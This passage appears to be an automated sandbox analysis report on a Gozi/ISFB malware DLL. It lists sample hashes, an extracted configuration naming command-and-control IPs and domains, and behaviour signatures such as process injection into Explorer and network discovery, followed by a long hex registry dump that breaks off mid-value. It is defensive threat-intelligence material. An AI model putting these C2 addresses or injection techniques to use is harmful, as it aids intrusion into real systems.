Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 16:02
Static task
static1
Behavioral task
behavioral1
Sample
aa856dedda137f7419ecc36766ed74e3.dll
Resource
win7-20220715-en
General
-
Target
aa856dedda137f7419ecc36766ed74e3.dll
-
Size
300KB
-
MD5
aa856dedda137f7419ecc36766ed74e3
-
SHA1
59a685b1ddd500747678ed66ffdb1afadb7b8023
-
SHA256
9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
-
SHA512
60dcb99e96369c32fc8330570021225575b01c3e7b4ecd42554d0b5dbca2796cdb86f93630b32c836892b67a3b50ff8b7594cff43d02a85f8822beb638011fff
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 4380 set thread context of 3116 4380 powershell.exe Explorer.EXE PID 3116 set thread context of 3576 3116 Explorer.EXE RuntimeBroker.exe PID 3116 set thread context of 3828 3116 Explorer.EXE RuntimeBroker.exe PID 3116 set thread context of 4552 3116 Explorer.EXE RuntimeBroker.exe PID 3116 set thread context of 1740 3116 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 2152 net.exe 1220 net.exe 824 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000e22218463a7d801383b808763a7d801383b808763a7d801bd5905000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000218ce28163a7d801218ce28163a7d801218ce28163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = a3b25a8b63a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008381428463a7d801864ea18a63a7d801864ea18a63a7d801401319000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = b1abff8163a7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000079d9f08163a7d80179d9f08163a7d80179d9f08163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000613439323131633833616662313164653134323636363662376332343139373263623334643939373135643633353837396136646363373333316161323939610000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000872c8800610034003900320031003100630038003300610066006200310031006400650031003400320036003600360036006200370063003200340031003900370032006300620033003400640039003900370031003500640036003300350038003700390061003600640063006300370033003300310061006100320039003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61343932313163383361666231316465313432363636366237633234313937326362333464393937313564363335383739613664636337333331616132393961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 7fdf2f8263a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = cf34488b63a7d801 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c0eb29be-1c77-40e1- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f64f1dc4-a930-4385- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000746f2f8463a7d8013e9b828763a7d8013e9b828763a7d801e78e08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000373732626338623330613061376237373337343232613632306536333634663434623532353539313835306664396333613537313132393563626235396666340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000f0197500370037003200620063003800620033003000610030006100370062003700370033003700340032003200610036003200300065003600330036003400660034003400620035003200350035003900310038003500300066006400390063003300610035003700310031003200390035006300620062003500390066006600340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37373262633862333061306137623737333734323261363230653633363466343462353235353931383530666439633361353731313239356362623539666634000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006